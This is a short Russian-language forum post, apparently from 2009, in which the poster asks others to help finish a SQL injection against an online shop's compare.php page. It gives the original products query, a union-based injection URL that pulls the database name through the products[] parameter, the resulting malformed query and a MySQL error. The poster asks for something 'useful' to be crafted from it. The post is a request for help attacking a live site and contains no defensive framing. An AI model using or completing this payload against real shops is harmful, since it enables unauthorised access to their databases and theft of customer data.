Доброго времени суток.
Помогите с SQL инъекцией.
по нормальному работает такой запрос:
SELECT
*
FROM products as p,
products_description as pd
WHERE p.products_id IN (1) and
p.products_id = pd.products_id
and pd.language_id = '1'
and p.products_status=1 order by pd.products_name limit 5

при определенном запросе можно влезть в IN ( ... )

например site/compare.php?cPath=&products[]=1)+union+select+1,2,DATABASE(),4,5,6+IN(1

получим
SELECT * FROM products as p, products_description as pd WHERE p.products_id IN (1) union select 1,2,DATABASE(),4,5,6 IN(1) and p.products_id = pd.products_id and pd.language_id = '1' and p.products_status=1 order by pd.products_name limit 5

ну и
MYSQL ERROR REPORT
- 13/05/2009 11:05:58
---------------------------------------
1109 - Unknown table 'p' in field list

Я не очень в SQL, потому не получается у меня состряпать что-то полезное))

Спасибо.